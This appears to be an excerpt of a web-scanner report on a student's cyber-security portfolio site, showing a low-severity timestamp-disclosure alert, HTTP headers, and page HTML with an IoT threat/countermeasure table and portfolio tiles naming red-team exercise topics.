          <tr class="valign-top">
          <td class="align-left">WSN Node Jamming</td>
          <td class="align-left">Jam Node Communication</td>
          <td class="align-left">IPSec Security Channel</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RF Interference Of RFID</td>
          <td class="align-left">Distortion In Node Communication</td>
          <td class="align-left">Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left" rowspan="12">Network</td>
          <td class="align-left">Traffic Analysis Attacks</td>
          <td class="align-left">Data Leakage (About Network)</td>
          <td class="align-left">Routing Security</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RFID Spoofing</td>
          <td class="align-left">Intrusion In Network Data Manipulation</td>
          <td class="align-left">GPS Location System</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RFID Unauthorized Access</td>
          <td class="align-left">Node Data Can Be Modified (Read, Write &amp; Delete)</td>
          <td class="align-left">Network Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Sinkhole Attack</td>
          <td class="align-left">Data Leakage (Data Of The Nodes)</td>
          <td class="align-left">Security Aware Ad Hoc Routing</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Man In The Middle Attack</td>
          <td class="align-left">Data Privacy Violation</td>
          <td class="align-left">Point-To-Point Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Routing Information Attack</td>
          <td class="align-left">Routing Loops (Network Destruction)</td>
          <td class="align-left">Encrypting Routing Tables</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Application Security</td>
          <td class="align-left">Privacy Violation</td>
          <td class="align-left">Web Application Scanner</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Data Security</td>
           <td class="align-left">Data Leakage (User Data On Cloud)</td>
          <td class="align-left">Homomorphic Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Underlying Infrastructure Security</td>
          <td class="align-left">Service Hijacking</td>
          <td class="align-left">Fragmentation Redundancy Scattering</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Third-Party Relationships</td>
          <td class="align-left">Data Leakage (User Data On Cloud)</td>
          <td class="align-left">Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Shared Resources</td>
          <td class="align-left">Resources Destruction</td>
          <td class="align-left">Hyper Safe</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Virtualization Threats</td>
          <td class="align-left">Resources Theft</td>
          <td class="align-left">Hyper Safe</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left" rowspan="6">Application</td>
          <td class="align-left">Phishing Attacks</td>
          <td class="align-left">Data Leakage (User Credentials Data)</td>
          <td class="align-left">Biometrics Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Virus, Worms, Trojan Horse, Spyware</td>
          <td class="align-left">Resource Destruction &amp; Hijacking</td>
          <td class="align-left">Protective Software</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Malicious Scripts</td>
          <td class="align-left">Hijacking</td>
          <td class="align-left">Firewalls</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Denial Of Service</td>
          <td class="align-left">Resource Destruction</td>
          <td class="align-left">Access Control Lists</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Data Protection And Recovery</td>
          <td class="align-left">Data Loss &amp; Catastrophic Damage</td>
          <td class="align-left">Cryptographic Hash Functions</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Software Vulnerabilities</td>
          <td class="align-left">Buffer Over Flow</td>
          <td class="align-left">Awareness Of Security</td>
          </tr>
          </tbody>
          </table>
          <a href="https://www.sciencedirect.com/science/article/pii/S108480452030237X#sec3">Source</a>
           <p>As seen in this article there are a lot of different vulnerabilities in IOT devices. And
          not all of them can be solved with just a good security protocol.</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: November 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal27" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal28" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
           </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal29" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal30" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal31" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
           <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal23" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal33" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal34" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
           <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal35" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal36" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal37" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal38" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal39" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal40" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script src="vendor/jquery/jquery.min.js"></script>
          <script src="vendor/bootstrap/js/bootstrap.bundle.min.js"></script>
          
          <script src="vendor/jquery-easing/jquery.easing.min.js"></script>
          
          <script src="js/jqBootstrapValidation.js"></script>
          <script src="js/contact_me.js"></script>
          
          <script src="js/agency.min.js"></script>
          
          <script src="https://cdn.jsdelivr.net/gh/google/code-prettify@master/loader/run_prettify.js"></script>
          </body>
          </html>
          
          Evidence
          16894306
          Solution

          Manually confirm that the timestamp data is not sensitive, and that the data cannot be aggregated to disclose exploitable patterns.

        6. GET https://beekmans.dev
          Alert tags
          Alert description

          A timestamp was disclosed by the application/web server - Unix

          Other info

          2000000000, which evaluates to: 2033-05-18 05:33:20

          Request
          Request line and header section (192 bytes)
          GET https://beekmans.dev HTTP/1.1
          Host: beekmans.dev
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
          Pragma: no-cache
          Cache-Control: no-cache
          
          
          Request body (0 bytes)
          Response
          Status line and header section (1047 bytes)
          HTTP/1.1 200 OK
          Date: Mon, 06 Dec 2021 09:55:11 GMT
          Content-Type: text/html; charset=UTF-8
          Connection: keep-alive
          vary: Accept-Encoding
          content-security-policy: default-src 'self' http: https: data: blob: 'unsafe-inline'
          x-frame-options: SAMEORIGIN
          x-xss-protection: 1; mode=block
          x-content-type-options: nosniff
          referrer-policy: no-referrer-when-downgrade
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          CF-Cache-Status: DYNAMIC
          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4lOrbKK8y%2Bn8QLhKEGpB7rePrCHT1J%2BQaOZJP06h5%2BW2GkK9CRq%2Fdn7ChLzJzoJLiDaKfMYCpMPOGx7ddQ5eVNaVcohEeYRecx%2BV4c%2BapqYy04o6ANFaN3V3sF2rfmk%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 6b94a31e5f8a4c13-AMS
          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
          
          
          Response body (178340 bytes)
          <!DOCTYPE html>
          <html lang="en">
          <head>
          <meta charset="utf-8">
          <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
          <meta name="description" content="">
          <meta name="author" content="">
          <title>Cyber portfolio</title>
          
          <link href="vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet">
          
          <link href="vendor/fontawesome-free/css/all.min.css" rel="stylesheet" type="text/css">
          <link href="https://fonts.googleapis.com/css?family=Montserrat:400,700" rel="stylesheet" type="text/css">
          <link href='https://fonts.googleapis.com/css?family=Kaushan+Script' rel='stylesheet' type='text/css'>
          <link href='https://fonts.googleapis.com/css?family=Droid+Serif:400,700,400italic,700italic' rel='stylesheet' type='text/css'>
          <link href='https://fonts.googleapis.com/css?family=Roboto+Slab:400,100,300,700' rel='stylesheet' type='text/css'>
          
          <link href="css/agency.min.css" rel="stylesheet">
          </head>
          <body id="page-top">
          
          <nav class="navbar navbar-expand-lg navbar-dark fixed-top" id="mainNav">
          <div class="container">
          <a class="navbar-brand js-scroll-trigger" href="#page-top">Cyber security</a>
          <button class="navbar-toggler navbar-toggler-right" type="button" data-toggle="collapse" data-target="#navbarResponsive" aria-controls="navbarResponsive" aria-expanded="false" aria-label="Toggle navigation">
          Menu
          <i class="fas fa-bars"></i>
          </button>
          <div class="collapse navbar-collapse" id="navbarResponsive">
          <ul class="navbar-nav text-uppercase ml-auto">
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#services">Services</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#portfolio">Portfolio</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#about">About</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#team">Team</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#contact">Contact</a>
          </li>
          </ul>
          </div>
          </div>
          </nav>
          
          <header class="masthead">
          <div class="container">
          <div class="intro-text">
          <div class="intro-lead-in">Welcome To My Portfolio!</div>
          <div class="intro-heading text-uppercase">It's Nice To Meet You</div>
          <a class="btn btn-primary btn-xl text-uppercase js-scroll-trigger" href="#services">Tell Me More</a>
          </div>
          </div>
          </header>
          
          <section id="services">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Introduction</h2>
          <h3 class="section-subheading text-muted">My project.</h3>
          </div>
          </div>
          <div class="row text-center">
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-shopping-cart fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Environment</h4>
          <p class="text-muted">I'm using my own Hyper visor (Microsoft's Hyper-V) on a private server in my home. I can connect via a VPN that's also running on this server to my home network to remotely manage the server and manage and deploy VM's. The server is an old DELL T310 with a Xeon x3440, 24GB ddr3 registered ecc 1333mhz memory and all VM's are installed on a Crucial MX500 ssd. The server is part of the home network just like every other computer in my home.</p>
          </div>
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-laptop fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Context</h4>
          <p class="text-muted">The network I'm building has as focus a webhosting company with some onsite employee's maybe a place for guests and some webservers hosting different websites.</p>
          </div>
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-lock fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Security</h4>
          <p class="text-muted">The network is secured by separating the webservers from the employees and guests on their own VLAN. The network is protected by a pfsense router running custom firewalls for every interface and running Surricata to identify and block possible threats.</p>
          </div>
          </div>
          </div>
          </section>
          
          <section class="bg-light" id="portfolio">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Portfolio</h2>
          <h3 class="section-subheading text-muted">Cyber security.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Blue teaming semester</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal1">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/01-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Self assessment week 1</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal2">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid portfolio-image" src="img/portfolio/blue/02-thumbnail.gif" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Network diagram V1</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal3">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/03-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Network diagram V2</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal4">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/04-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Secure connections</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal5">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/05-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">IDS/IPS</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal6">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/06-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Information Security and Risk Analysis</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal7">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/07-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">IT Monitoring</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Red teaming semester</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal8">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/08-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">SQL injection</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal9">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/09-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Command injection</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal10">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/10-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Cross-site scripting</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal11">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/11-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Cross-site request forgery</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal12">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/12-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Path traversal</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal13">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/13-thumbnail.jpeg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Password cracking</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal14">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/14-thumbnail.png" alt="">
          </a>
